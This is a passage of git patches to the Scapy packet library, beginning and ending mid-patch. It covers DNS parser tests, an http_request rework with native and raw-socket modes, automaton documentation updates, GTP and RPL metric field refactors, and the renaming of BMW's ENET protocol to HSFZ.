DNS(raw(DNS(id=1,ra=1,an=DNSRR(rrname='scapy', type='TXT', rdata="niceday", ttl=1)))) +assert p[DNS].an.rdata == [b"niceday"] + +p = DNS(raw(DNS(id=1,ra=1,an=DNSRR(rrname='secdev', type='TXT', rdata=["sweet", "celestia"], ttl=1)))) +assert p[DNS].an.rdata == [b"sweet", b"celestia"] +assert raw(p) == b'\x00\x01\x01\x80\x00\x00\x00\x01\x00\x00\x00\x00\x06secdev\x00\x00\x10\x00\x01\x00\x00\x00\x01\x00\x0f\x05sweet\x08celestia' + += DNS - Malformed DNS over TCP message + +try: + p = IP(IP(raw(IP()/TCP()/DNS(length=28))[:-13])) + assert False +except Scapy_Exception as e: + assert str(e) == "Malformed DNS message: too small!" + +try: + p = IP(raw(IP()/TCP()/DNS(length=28, qdcount=1))) + assert False +except Scapy_Exception as e: + assert str(e) == "Malformed DNS message: invalid length!" From 7c092ddeb4878d90d1b050875a0858dd26f856e7 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 27 Sep 2020 17:39:00 +0000 Subject: [PATCH 0319/1632] Improve http_request --- scapy/layers/http.py | 52 +++++++++++++++++++++++++++++++++----------- test/regression.uts | 20 +++++++++++------ 2 files changed, 52 insertions(+), 20 deletions(-) diff --git a/scapy/layers/http.py b/scapy/layers/http.py index 58a4efba134..c01bed120fa 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -44,9 +44,11 @@ import io import os import re +import socket import struct import subprocess +from scapy.base_classes import Net from scapy.compat import plain_str, bytes_encode, \ gzip_compress, gzip_decompress from scapy.config import conf @@ -54,6 +56,7 @@ from scapy.error import warning, log_loading from scapy.fields import StrField from scapy.packet import Packet, bind_layers, bind_bottom_up, Raw +from scapy.supersocket import StreamSocket from scapy.utils import get_temp_file, ContextManagerSubprocess from scapy.layers.inet import TCP, TCP_client @@ -665,7 +668,7 @@ def guess_payload_class(self, payload): def http_request(host, path="/", port=80, timeout=3, display=False, verbose=0, - iptables=False, iface=None, + raw=False, iptables=False, iface=None, **headers): """Util to perform an HTTP request, using the TCP_client. @@ -674,13 +677,18 @@ def http_request(host, path="/", port=80, timeout=3, :param port: the port (default 80) :param timeout: timeout before None is returned :param display: display the resullt in the default browser (default False) - :param iface: interface to use. default: conf.iface - :param iptables: temporarily prevents the kernel from - answering with a TCP RESET message. + :param raw: opens a raw socket instead of going through the OS's TCP + socket. Scapy will then use its own TCP client. + Careful, the OS might cancel the TCP connection with RST. + :param iptables: when raw is enabled, this calls iptables to temporarily + prevent the OS from sending TCP RST to the host IP. + On Linux, you'll almost certainly need this. + :param iface: interface to use. Changing this turns on "raw" :param headers: any additional headers passed to the request :returns: the HTTPResponse packet """ + from scapy.sessions import TCPSession http_headers = { "Accept_Encoding": b'gzip, deflate', "Cache_Control": b'no-cache', @@ -691,19 +699,37 @@ def http_request(host, path="/", port=80, timeout=3, } http_headers.update(headers) req = HTTP() / HTTPRequest(**http_headers) - tcp_client = TCP_client.tcplink(HTTP, host, port, debug=verbose, - iface=iface) ans = None - if iptables: - ip = tcp_client.atmt.dst + + # Open a socket + if iface is not None: + raw = True + if raw: + # Use TCP_client on a raw socket iptables_rule = "iptables -%c INPUT -s %s -p tcp --sport 80 -j DROP" - assert(os.system(iptables_rule % ('A', ip)) == 0) + if iptables: + host = str(Net(host)) + assert(os.system(iptables_rule % ('A', host)) == 0) + sock = TCP_client.tcplink(HTTP, host, port, debug=verbose, + iface=iface) + else: + # Use a native TCP socket + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect((host, port)) + sock = StreamSocket(sock, HTTP) + # Send the request and wait for the answer try: - ans = tcp_client.sr1(req, timeout=timeout, verbose=verbose) + ans = sock.sr1( + req, + session=TCPSession(app=True), + timeout=timeout, + verbose=verbose + ) finally: - tcp_client.close() - if iptables: - assert(os.system(iptables_rule % ('D', ip)) == 0) + sock.close() + if raw and iptables: + host = str(Net(host)) + assert(os.system(iptables_rule % ('D', host)) == 0) if ans: if display: if Raw not in ans: diff --git a/test/regression.uts b/test/regression.uts index b03ee141799..a2461dd1031 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2406,9 +2406,9 @@ assert '"BEGIN" -> "END"' in graph ~ automaton netaccess needs_root * This test retries on failure because it may fail quite easily -# This test doesn't pass on Travis BSD, and will be skipped +import functools -SECDEV_IP4 = "203.178.141.194" +SECDEV_IP4 = "217.25.178.5" if LINUX: import os @@ -2424,7 +2424,7 @@ def _tcp_client_test(): Cache_Control=b'no-cache', Pragma=b'no-cache', Connection=b'keep-alive', - Host=b'www.kame.net', + Host=b'www.secdev.org', ) t = TCP_client.tcplink(HTTP, SECDEV_IP4, 80) response = t.sr1(req, timeout=3) @@ -2433,21 +2433,27 @@ def _tcp_client_test(): assert response.Status_Code == b'200' assert response.Reason_Phrase == b'OK' -def _http_request_test(): - response = http_request("www.kame.net", path="/", iptables=LINUX) +def _http_request_test(_raw=False): + response = http_request("www.google.com", path="/", raw=_raw, iptables=LINUX) assert response.Http_Version == b'HTTP/1.1' assert response.Status_Code == b'200' assert response.Reason_Phrase == b'OK' -# This test doesn't pass on Travis BSD +# Native sockets +retry_test(_http_request_test) + +# Our raw socket test doesn't pass on Travis BSD +# (likely because the firewall is different and our iptables call isn't enough) if not BSD: + retry_test(functools.partial(_http_request_test, _raw=True)) + +if LINUX: try: retry_test(_tcp_client_test) finally: if LINUX: # Remove the iptables rule assert(os.system(IPTABLE_RULE % ('D', SECDEV_IP4)) == 0) - retry_test(_http_request_test) ############ ############ From 3c65faccb48f97251a74759c302cdc4f245f625f Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 4 Oct 2020 20:40:40 +0200 Subject: [PATCH 0320/1632] Use actions in TCP_client to be a better doc example --- doc/scapy/advanced_usage.rst | 56 +++++++------ doc/scapy/graphics/ATMT_TCP_client.svg | 104 +++++++++++++------------ scapy/layers/inet.py | 20 +++-- 3 files changed, 93 insertions(+), 87 deletions(-) diff --git a/doc/scapy/advanced_usage.rst b/doc/scapy/advanced_usage.rst index 09967489694..7dd26df2491 100644 --- a/doc/scapy/advanced_usage.rst +++ b/doc/scapy/advanced_usage.rst @@ -753,35 +753,6 @@ When the automaton switches to a given state, the state's method is executed. Th def waiting_timeout(self): raise self.ERROR_TIMEOUT() -.. note:: Within an ``ATMT.receive_condition`` handler, it is possible to change the state while passing an argument for the conditions of the next state using the ``action_parameters`` function. This allows to immediately re-trigger the ``ATMT.receive_condition`` of the new state (or any condition that requires an argument). For instance: ``raise self.NEW_STATE().action_parameters(pkt)`` - -For instance, this automaton will go from ``WAITING`` to ``ACK_RECEIVED`` with a **single** FIN+ACK TCP packet. - -:: - - class Example(Automaton): - @ATMT.state() - def WAITING(self): - pass - - @ATMT.state() - def FIN_RECEIVED(self): - pass - - @ATMT.state() - def ACK_RECEIVED(self): - pass - - @ATMT.receive_condition(WAITING) - def is_fin(self, pkt): - if pkt[TCP].flags.F: - raise self.FIN_RECEIVED().action_parameters(pkt) - - @ATMT.receive_condition(FIN_RECEIVED) - def is_ack(self, pkt): - if pkt[TCP].flags.A: - raise self.ACK_RECEIVED() - Decorator for actions ~~~~~~~~~~~~~~~~~~~~~ @@ -802,6 +773,7 @@ Actions are methods that are decorated by the return of ``ATMT.action`` function def maybe_go_to_end(self): if random() > 0.5: raise self.END() + @ATMT.condition(BEGIN, prio=2) def certainly_go_to_end(self): raise self.END() @@ -809,9 +781,11 @@ Actions are methods that are decorated by the return of ``ATMT.action`` function @ATMT.action(maybe_go_to_end) def maybe_action(self): print "We are lucky..." + @ATMT.action(certainly_go_to_end) def certainly_action(self): print "We are not lucky..." + @ATMT.action(maybe_go_to_end, prio=1) @ATMT.action(certainly_go_to_end, prio=1) def always_action(self): @@ -827,6 +801,30 @@ The two possible outputs are:: We are lucky... This wasn't luck!... + +.. note:: If you want to pass a parameter to an action, you can use the ``action_parameters`` function while raising the next state. + +In the following example, the ``send_copy`` action takes a parameter passed by ``is_fin``:: + + class Example(Automaton): + @ATMT.state() + def WAITING(self): + pass + + @ATMT.state() + def FIN_RECEIVED(self): + pass + + @ATMT.receive_condition(WAITING) + def is_fin(self, pkt): + if pkt[TCP].flags.F: + raise self.FIN_RECEIVED().action_parameters(pkt) + + @ATMT.action(is_fin) + def send_copy(self, pkt): + send(pkt) + + Methods to overload ^^^^^^^^^^^^^^^^^^^ diff --git a/doc/scapy/graphics/ATMT_TCP_client.svg b/doc/scapy/graphics/ATMT_TCP_client.svg index c1c589aafc8..a89ca986940 100644 --- a/doc/scapy/graphics/ATMT_TCP_client.svg +++ b/doc/scapy/graphics/ATMT_TCP_client.svg @@ -4,30 +4,30 @@ - - + + Automaton_metaclass - + START - -START + +START SYN_SENT - -SYN_SENT + +SYN_SENT START->SYN_SENT - - -connect ->[send_syn] + + +connect +>[send_syn] @@ -38,93 +38,95 @@ STOP - -STOP + +STOP STOP_SENT_FIN_ACK - -STOP_SENT_FIN_ACK + +STOP_SENT_FIN_ACK STOP->STOP_SENT_FIN_ACK - - -stop_behavior + + +stop_requested +>[stop_send_finack] ESTABLISHED - -ESTABLISHED + +ESTABLISHED SYN_SENT->ESTABLISHED - - -synack_received ->[send_ack_of_synack] + + +synack_received +>[send_ack_of_synack] STOP_SENT_FIN_ACK->CLOSED - - -stop_ack_received + + +stop_fin_received +>[stop_send_ack] STOP_SENT_FIN_ACK->CLOSED - - -stop_ack_timeout/1.0s + + +stop_ack_timeout/1.0s ESTABLISHED->CLOSED - - -reset_received + + +reset_received ESTABLISHED->ESTABLISHED - - -incoming_data_received ->[receive_data] + + +incoming_data_received +>[receive_data] ESTABLISHED->ESTABLISHED - - -outgoing_data_received ->[send_data] + + +outgoing_data_received +>[send_data] LAST_ACK - -LAST_ACK + +LAST_ACK ESTABLISHED->LAST_ACK - - -fin_received ->[send_finack] + + +fin_received +>[send_finack] LAST_ACK->CLOSED - - -ack_of_fin_received + + +ack_of_fin_received diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index edfd2ef22bd..b919f6bb51f 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -1917,19 +1917,25 @@ def ack_of_fin_received(self, pkt): raise self.CLOSED() @ATMT.condition(STOP) - def stop_behavior(self): + def stop_requested(self): + raise self.STOP_SENT_FIN_ACK() + + @ATMT.action(stop_requested) + def stop_send_finack(self): self.l4[TCP].flags = "FA" self.send(self.l4) self.l4[TCP].seq += 1 - raise self.STOP_SENT_FIN_ACK() @ATMT.receive_condition(STOP_SENT_FIN_ACK) - def stop_ack_received(self, pkt): + def stop_fin_received(self, pkt): if pkt[TCP].flags.F: - self.l4[TCP].flags = "FA" - self.l4[TCP].ack = pkt[TCP].seq + 1 - self.send(self.l4) - raise self.CLOSED() + raise self.CLOSED().action_parameters(pkt) + + @ATMT.action(stop_fin_received) + def stop_send_ack(self, pkt): + self.l4[TCP].flags = "A" + self.l4[TCP].ack = pkt[TCP].seq + 1 + self.send(self.l4) @ATMT.timeout(STOP_SENT_FIN_ACK, 1) def stop_ack_timeout(self): From 7d952cbb9f7fd63e9910a8af12b10ac39d93c4f6 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 1 Oct 2020 16:00:43 +0200 Subject: [PATCH 0321/1632] Use any brotli version except 1.0.8/1.0.9 --- tox.ini | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tox.ini b/tox.ini index 2442c436211..4112ce69a68 100644 --- a/tox.ini +++ b/tox.ini @@ -22,7 +22,7 @@ deps = mock cryptography coverage python-can - brotli<1.0.8 + brotli>=1.0.0,!=1.0.8,!=1.0.9 zstandard==0.14.0 platform = linux_non_root,linux_root: linux From 5764e520902c9ec4b56c2192c213f1b7309de190 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 15 Oct 2020 17:13:40 +0200 Subject: [PATCH 0322/1632] Improve GTP & RPL metrics packets --- scapy/contrib/gtp.py | 43 ++++----- scapy/contrib/rpl_metrics.py | 172 +++++++++++++++-------------------- 2 files changed, 93 insertions(+), 122 deletions(-) diff --git a/scapy/contrib/gtp.py b/scapy/contrib/gtp.py index ac211176cb0..de40e83578a 100644 --- a/scapy/contrib/gtp.py +++ b/scapy/contrib/gtp.py @@ -9,6 +9,13 @@ # scapy.contrib.description = GPRS Tunneling Protocol (GTP) # scapy.contrib.status = loads +""" +GPRS Tunneling Protocol (GTP) + +Spec: 3GPP TS 29.060 and 3GPP TS 29.274 +Some IEs: 3GPP TS 24.008 +""" + from __future__ import absolute_import import struct @@ -572,15 +579,16 @@ class IE_MSInternationalNumber(IE_Base): class QoS_Profile(IE_Base): name = "QoS profile" + # 3GPP TS 24.008 10.5.6.5 fields_desc = [ByteField("qos_ei", 0), ByteField("length", None), - XBitField("qos_spare1", 0x00, 2), + XBitField("spare1", 0x00, 2), XBitField("delay_class", 0x000, 3), XBitField("reliability_class", 0x000, 3), XBitField("peak_troughput", 0x0000, 4), - BitField("spare", 0, 1), + BitField("spare2", 0, 1), XBitField("precedence_class", 0x000, 3), - XBitField("qos_spare2", 0x000, 3), + XBitField("spare3", 0x000, 3), XBitField("mean_troughput", 0x00000, 5), XBitField("traffic_class", 0x000, 3), XBitField("delivery_order", 0x00, 2), @@ -601,8 +609,8 @@ class IE_QoS(IE_Base): fields_desc = [ByteEnumField("ietype", 135, IEType), ShortField("length", None), ByteField("allocation_retention_prioiry", 1), - - ConditionalField(XBitField("ie_qos_spare1", 0x00, 2), + # 3GPP TS 24.008 10.5.6.5 + ConditionalField(XBitField("spare1", 0x00, 2), lambda p: p.length and p.length > 1), ConditionalField(XBitField("delay_class", 0x000, 3), lambda p: p.length and p.length > 1), @@ -611,12 +619,12 @@ class IE_QoS(IE_Base): ConditionalField(XBitField("peak_troughput", 0x0000, 4), lambda p: p.length and p.length > 2), - ConditionalField(BitField("ie_qos_spare2", 0, 1), + ConditionalField(BitField("spare2", 0, 1), lambda p: p.length and p.length > 2), ConditionalField(XBitField("precedence_class", 0x000, 3), lambda p: p.length and p.length > 2), - ConditionalField(XBitField("ie_qos_spare3", 0x000, 3), + ConditionalField(XBitField("spare3", 0x000, 3), lambda p: p.length and p.length > 3), ConditionalField(XBitField("mean_troughput", 0x00000, 5), lambda p: p.length and p.length > 3), @@ -652,7 +660,7 @@ class IE_QoS(IE_Base): None), lambda p: p.length and p.length > 11), - ConditionalField(XBitField("spare", 0x000, 3), + ConditionalField(XBitField("spare4", 0x000, 3), lambda p: p.length and p.length > 12), ConditionalField(BitField("signaling_indication", 0, 1), lambda p: p.length and p.length > 12), @@ -727,12 +735,7 @@ class IE_MSTimeZone(IE_Base): fields_desc = [ByteEnumField("ietype", 153, IEType), ShortField("length", None), ByteField("timezone", 0), - BitField("ie_mstz_spare1", 0, 1), - BitField("ie_mstz_spare2", 0, 1), - BitField("ie_mstz_spare3", 0, 1), - BitField("ie_mstz_spare4", 0, 1), - BitField("ie_mstz_spare5", 0, 1), - BitField("ie_mstz_spare6", 0, 1), + BitField("spare", 0, 6), XBitField("daylight_saving_time", 0x00, 2)] @@ -752,13 +755,10 @@ class IE_MSInfoChangeReportingAction(IE_Base): class IE_DirectTunnelFlags(IE_Base): name = "Direct Tunnel Flags" + # 29.060 7.7.81 fields_desc = [ByteEnumField("ietype", 182, IEType), ShortField("length", 1), - BitField("ie_dtf_spare1", 0, 1), - BitField("ie_dtf_spare2", 0, 1), - BitField("ie_dtf_spare3", 0, 1), - BitField("ie_dtf_spare4", 0, 1), - BitField("ie_dtf_spare5", 0, 1), + BitField("spare", 0, 5), BitField("EI", 0, 1), BitField("GCSI", 0, 1), BitField("DTI", 0, 1)] @@ -773,12 +773,13 @@ class IE_BearerControlMode(IE_Base): class IE_EvolvedAllocationRetentionPriority(IE_Base): name = "Evolved Allocation/Retention Priority" + # 29.060 7.7.91 fields_desc = [ByteEnumField("ietype", 191, IEType), ShortField("length", 1), - BitField("ie_earp_spare1", 0, 1), + BitField("spare1", 0, 1), BitField("PCI", 0, 1), XBitField("PL", 0x0000, 4), - BitField("ie_earp_spare2", 0, 1), + BitField("spare2", 0, 1), BitField("PVI", 0, 1)] diff --git a/scapy/contrib/rpl_metrics.py b/scapy/contrib/rpl_metrics.py index afaa1789249..01a95bc01f8 100644 --- a/scapy/contrib/rpl_metrics.py +++ b/scapy/contrib/rpl_metrics.py @@ -96,6 +96,16 @@ class DAGMCObj(Packet): Set the length field in DAG Metric Constraint Control Option """ name = 'Dummy DAG MC Object' + # RFC 6551 - 2.1 + fields_desc = [ByteEnumField("otype", 0, DAGMC_OBJTYPE), + BitField("resflags", 0, 5), + BitField("P", 0, 1), + BitField("C", 0, 1), + BitField("O", 0, 1), + BitField("R", 0, 1), + BitEnumField("A", 0, 3, AGG_RTMETRIC), + BitField("prec", 0, 4), + ByteField("len", None)] def post_build(self, pkt, pay): pkt += pay @@ -111,20 +121,15 @@ class RPLDAGMCNSA(DAGMCObj): DAG Metric: Node State and Attributes """ name = "Node State and Attributes" - fields_desc = [ByteEnumField("otype", 1, DAGMC_OBJTYPE), - BitField("resflags", 0, 5), - BitField("P", 0, 1), - BitField("C", 0, 1), - BitField("O", 0, 1), - BitField("R", 0, 1), - BitEnumField("A", 0, 3, AGG_RTMETRIC), - BitField("prec", 0, 4), - ByteField("len", None), - # NSA Object Body Format - ByteField("res", 0), - BitField("flags", 0, 6), - BitField("A2", 0, 1), - BitField("O2", 0, 1)] + otype = 1 + # RFC 6551 - 3.1 + fields_desc = DAGMCObj.fields_desc + [ + # NSA Object Body Format + ByteField("res", 0), + BitField("flags", 0, 6), + BitField("Agg", 0, 1), # A + BitField("Overload", 0, 1), # O + ] class RPLDAGMCNodeEnergy(DAGMCObj): @@ -132,21 +137,16 @@ class RPLDAGMCNodeEnergy(DAGMCObj): DAG Metric: Node Energy """ name = "Node Energy" - fields_desc = [ByteEnumField("otype", 2, DAGMC_OBJTYPE), - BitField("resflags", 0, 5), - BitField("P", 0, 1), - BitField("C", 0, 1), - BitField("O", 0, 1), - BitField("R", 0, 1), - BitEnumField("A", 0, 3, AGG_RTMETRIC), - BitField("prec", 0, 4), - ByteField("len", None), - # NE Sub-Object Format - BitField("flags", 0, 4), - BitField("I", 0, 1), - BitField("T", 0, 2), - BitField("E", 0, 1), - ByteField("E_E", 0)] + otype = 2 + # RFC 6551 - 3.2 + fields_desc = DAGMCObj.fields_desc + [ + # NE Sub-Object Format + BitField("flags", 0, 4), + BitField("I", 0, 1), + BitField("T", 0, 2), + BitField("E", 0, 1), + ByteField("E_E", 0) + ] class RPLDAGMCHopCount(DAGMCObj): @@ -154,19 +154,14 @@ class RPLDAGMCHopCount(DAGMCObj): DAG Metric: Hop Count """ name = "Hop Count" - fields_desc = [ByteEnumField("otype", 3, DAGMC_OBJTYPE), - BitField("resflags", 0, 5), - BitField("P", 0, 1), - BitField("C", 0, 1), - BitField("O", 0, 1), - BitField("R", 0, 1), - BitEnumField("A", 0, 3, AGG_RTMETRIC), - BitField("prec", 0, 4), - ByteField("len", None), - # Sub-Object Format - BitField("res", 0, 4), - BitField("flags", 0, 4), - ByteField("HopCount", 1)] + otype = 3 + # RFC 6551 - 3.3 + fields_desc = DAGMCObj.fields_desc + [ + # Sub-Object Format + BitField("res", 0, 4), + BitField("flags", 0, 4), + ByteField("HopCount", 1) + ] class RPLDAGMCLinkThroughput(DAGMCObj): @@ -174,17 +169,12 @@ class RPLDAGMCLinkThroughput(DAGMCObj): DAG Metric: Link Throughput """ name = "Link Throughput" - fields_desc = [ByteEnumField("otype", 4, DAGMC_OBJTYPE), - BitField("resflags", 0, 5), - BitField("P", 0, 1), - BitField("C", 0, 1), - BitField("O", 0, 1), - BitField("R", 0, 1), - BitEnumField("A", 0, 3, AGG_RTMETRIC), - BitField("prec", 0, 4), - ByteField("len", None), - # Sub-Object Format - IntField("Throughput", 1)] + otype = 4 + # RFC 6551 - 4.1 + fields_desc = DAGMCObj.fields_desc + [ + # Sub-Object Format + IntField("Throughput", 1) + ] class RPLDAGMCLinkLatency(DAGMCObj): @@ -192,17 +182,12 @@ class RPLDAGMCLinkLatency(DAGMCObj): DAG Metric: Link Latency """ name = "Link Latency" - fields_desc = [ByteEnumField("otype", 5, DAGMC_OBJTYPE), - BitField("resflags", 0, 5), - BitField("P", 0, 1), - BitField("C", 0, 1), - BitField("O", 0, 1), - BitField("R", 0, 1), - BitEnumField("A", 0, 3, AGG_RTMETRIC), - BitField("prec", 0, 4), - ByteField("len", None), - # NE Sub-Object Format - IntField("Latency", 1)] + otype = 5 + # RFC 6551 - 4.2 + fields_desc = DAGMCObj.fields_desc + [ + # NE Sub-Object Format + IntField("Latency", 1) + ] class RPLDAGMCLinkQualityLevel(DAGMCObj): @@ -210,19 +195,14 @@ class RPLDAGMCLinkQualityLevel(DAGMCObj): DAG Metric: Link Quality Level (LQL) """ name = "Link Quality Level" - fields_desc = [ByteEnumField("otype", 6, DAGMC_OBJTYPE), - BitField("resflags", 0, 5), - BitField("P", 0, 1), - BitField("C", 0, 1), - BitField("O", 0, 1), - BitField("R", 0, 1), - BitEnumField("A", 0, 3, AGG_RTMETRIC), - BitField("prec", 0, 4), - ByteField("len", None), - # Sub-Object Format - ByteField("res", 0), - BitField("val", 0, 3), - BitField("counter", 0, 5)] + otype = 6 + # RFC 6551 - 4.3.1 + fields_desc = DAGMCObj.fields_desc + [ + # Sub-Object Format + ByteField("res", 0), + BitField("val", 0, 3), + BitField("counter", 0, 5) + ] class RPLDAGMCLinkETX(DAGMCObj): @@ -230,17 +210,12 @@ class RPLDAGMCLinkETX(DAGMCObj): DAG Metric: Link ETX """ name = "Link ETX" - fields_desc = [ByteEnumField("otype", 7, DAGMC_OBJTYPE), - BitField("resflags", 0, 5), - BitField("P", 0, 1), - BitField("C", 0, 1), - BitField("O", 0, 1), - BitField("R", 0, 1), - BitEnumField("A", 0, 3, AGG_RTMETRIC), - BitField("prec", 0, 4), - ByteField("len", None), - # Sub-Object Format - ShortField("ETX", 1)] + otype = 7 + # RFC 6551 - 4.3.2 + fields_desc = DAGMCObj.fields_desc + [ + # Sub-Object Format + ShortField("ETX", 1) + ] # Note: Wireshark shows warning decoding LinkColor. @@ -250,19 +225,14 @@ class RPLDAGMCLinkColor(DAGMCObj): DAG Metric: Link Color """ name = "Link Color" - fields_desc = [ByteEnumField("otype", 8, DAGMC_OBJTYPE), - BitField("resflags", 0, 5), - BitField("P", 0, 1), - BitField("C", 0, 1), - BitField("O", 0, 1), - BitField("R", 0, 1), - BitEnumField("A", 0, 3, AGG_RTMETRIC), - BitField("prec", 0, 4), - ByteField("len", None), - # Sub-Object Format - ByteField("res", 0), - BitField("color", 1, 10), - BitField("counter", 1, 6)] + otype = 8 + # RFC 6551 - 4.4.1 + fields_desc = DAGMCObj.fields_desc + [ + # Sub-Object Format + ByteField("res", 0), + BitField("color", 1, 10), + BitField("counter", 1, 6) + ] DAGMC_CLS = {1: RPLDAGMCNSA, From ae7a4ed95ea24187aa7d6338cf8cc833aee82106 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 14 Oct 2020 10:15:32 +0200 Subject: [PATCH 0323/1632] This PR changes the protocol name of a BMW proprietary protocol. ENET was actually the wrong name for this protocol. The protocol itself is called HSFZ. The interface inside a car is called ENET. --- doc/scapy/layers/automotive.rst | 4 +- .../automotive/bmw/{enet.py => hsfz.py} | 40 ++++++++++--------- .../automotive/bmw/{enet.uts => hsfz.uts} | 20 +++++----- 3 files changed, 33 insertions(+), 31 deletions(-) rename scapy/contrib/automotive/bmw/{enet.py => hsfz.py} (70%) rename test/contrib/automotive/bmw/{enet.uts => hsfz.uts} (68%) diff --git a/doc/scapy/layers/automotive.rst b/doc/scapy/layers/automotive.rst index 7b19e3b1719..2b9142d9a63 100644 --- a/doc/scapy/layers/automotive.rst +++ b/doc/scapy/layers/automotive.rst @@ -30,7 +30,7 @@ function to get all information about one specific protocol. | +----------------------+--------------------------------------------------------+ | | SOME/IP | SOMEIP, SD | | +----------------------+--------------------------------------------------------+ -| | BMW ENET | ENET, ENETSocket | +| | BMW HSFZ | HSFZ, HSFZSocket | | +----------------------+--------------------------------------------------------+ | | OBD | OBD, OBD_S0X | | +----------------------+--------------------------------------------------------+ @@ -714,7 +714,7 @@ UDS === The main usage of UDS is flashing and diagnostic of an ECU. UDS is an -application layer protocol and can be used as a DoIP or ENET payload or a UDS packet +application layer protocol and can be used as a DoIP or HSFZ payload or a UDS packet can directly be sent over an ISOTPSocket. Every OEM has its own customization of UDS. This increases the difficulty of generic applications and OEM specific knowledge is required for penetration tests. RoutineControl jobs and ReadDataByIdentifier/WriteDataByIdentifier diff --git a/scapy/contrib/automotive/bmw/enet.py b/scapy/contrib/automotive/bmw/hsfz.py similarity index 70% rename from scapy/contrib/automotive/bmw/enet.py rename to scapy/contrib/automotive/bmw/hsfz.py index cd8bfbc72dd..e06914091b2 100644 --- a/scapy/contrib/automotive/bmw/enet.py +++ b/scapy/contrib/automotive/bmw/hsfz.py @@ -3,9 +3,10 @@ # Copyright (C) Nils Weiss # This program is published under a GPLv2 license -# scapy.contrib.description = ENET - BMW diagnostic protocol over Ethernet +# scapy.contrib.description = HSFZ - BMW High-Speed-Fahrzeug-Zugang # scapy.contrib.status = loads + import struct import socket import time @@ -20,15 +21,16 @@ """ -BMW specific diagnostic over IP protocol implementation ENET. -Also called BMW FAST. +BMW HSFZ (High-Speed-Fahrzeug-Zugang / High-Speed-Car-Access). +BMW specific diagnostic over IP protocol implementation. +The physical interface for this connection is called ENET. """ -# #########################ENET################################### +# #########################HSFZ################################### -class ENET(Packet): - name = 'ENET' +class HSFZ(Packet): + name = 'HSFZ' fields_desc = [ IntField('length', None), ShortEnumField('type', 1, {0x01: "message", @@ -59,30 +61,30 @@ def post_build(self, pkt, pay): return pkt + pay -bind_bottom_up(TCP, ENET, sport=6801) -bind_bottom_up(TCP, ENET, dport=6801) -bind_layers(TCP, ENET, sport=6801, dport=6801) -bind_layers(ENET, UDS) +bind_bottom_up(TCP, HSFZ, sport=6801) +bind_bottom_up(TCP, HSFZ, dport=6801) +bind_layers(TCP, HSFZ, sport=6801, dport=6801) +bind_layers(HSFZ, UDS) -# ########################ENETSocket################################### +# ########################HSFZSocket################################### -class ENETSocket(StreamSocket): +class HSFZSocket(StreamSocket): def __init__(self, ip='127.0.0.1', port=6801): self.ip = ip self.port = port s = socket.socket() s.connect((self.ip, self.port)) - StreamSocket.__init__(self, s, ENET) + StreamSocket.__init__(self, s, HSFZ) -class ISOTP_ENETSocket(ENETSocket): +class ISOTP_HSFZSocket(HSFZSocket): def __init__(self, src, dst, ip='127.0.0.1', port=6801, basecls=ISOTP): - super(ISOTP_ENETSocket, self).__init__(ip, port) + super(ISOTP_HSFZSocket, self).__init__(ip, port) self.src = src self.dst = dst - self.basecls = ENET + self.basecls = HSFZ self.outputcls = basecls def send(self, x): @@ -94,9 +96,9 @@ def send(self, x): except AttributeError: pass - super(ISOTP_ENETSocket, self).send( - ENET(src=self.src, dst=self.dst) / x) + super(ISOTP_HSFZSocket, self).send( + HSFZ(src=self.src, dst=self.dst) / x) def recv(self, x=MTU): - pkt = super(ISOTP_ENETSocket, self).recv(x) + pkt = super(ISOTP_HSFZSocket, self).recv(x) return self.outputcls(bytes(pkt[1])) diff --git a/test/contrib/automotive/bmw/enet.uts b/test/contrib/automotive/bmw/hsfz.uts similarity index 68% rename from test/contrib/automotive/bmw/enet.uts rename to test/contrib/automotive/bmw/hsfz.uts index da8b05a7fe6..6976aa32792 100644 --- a/test/contrib/automotive/bmw/enet.uts +++ b/test/contrib/automotive/bmw/hsfz.uts @@ -1,21 +1,21 @@ -+ ENET Contrib tests ++ HSFZ Contrib tests = Load Contrib Layer -load_contrib("automotive.bmw.enet", globals_dict=globals()) +load_contrib("automotive.bmw.hsfz", globals_dict=globals()) = Basic Test 1 -pkt = ENET(type=1, src=0xf4, dst=0x10)/Raw(b'\x11\x22\x33') +pkt = HSFZ(type=1, src=0xf4, dst=0x10)/Raw(b'\x11\x22\x33') assert bytes(pkt) == b'\x00\x00\x00\x05\x00\x01\xf4\x10\x11"3' = Basic Test 2 -pkt = ENET(type=1, src=0xf4, dst=0x10)/Raw(b'\x11\x22\x33\x11\x11\x11\x11\x11') +pkt = HSFZ(type=1, src=0xf4, dst=0x10)/Raw(b'\x11\x22\x33\x11\x11\x11\x11\x11') assert bytes(pkt) == b'\x00\x00\x00\x0a\x00\x01\xf4\x10\x11"3\x11\x11\x11\x11\x11' = Basic Dissect Test -pkt = ENET(b'\x00\x00\x00\x0a\x00\x01\xf4\x10\x11"3\x11\x11\x11\x11\x11') +pkt = HSFZ(b'\x00\x00\x00\x0a\x00\x01\xf4\x10\x11"3\x11\x11\x11\x11\x11') assert pkt.length == 10 assert pkt.src == 0xf4 assert pkt.dst == 0x10 @@ -25,12 +25,12 @@ assert pkt[2].resetType == 34 = Build Test -pkt = ENET(src=0xf4, dst=0x10)/Raw(b"0" * 20) +pkt = HSFZ(src=0xf4, dst=0x10)/Raw(b"0" * 20) assert bytes(pkt) == b'\x00\x00\x00\x16\x00\x01\xf4\x10' + b"0" * 20 = Dissect Test -pkt = ENET(b'\x00\x00\x00\x18\x00\x01\xf4\x10\x67\x01' + b"0" * 20) +pkt = HSFZ(b'\x00\x00\x00\x18\x00\x01\xf4\x10\x67\x01' + b"0" * 20) assert pkt.length == 24 assert pkt.src == 0xf4 assert pkt.dst == 0x10 @@ -40,7 +40,7 @@ assert len(pkt[1]) == pkt.length - 2 = Dissect Test with padding -pkt = ENET(b'\x00\x00\x00\x18\x00\x01\xf4\x10\x67\x01' + b"0" * 20 + b"p" * 100) +pkt = 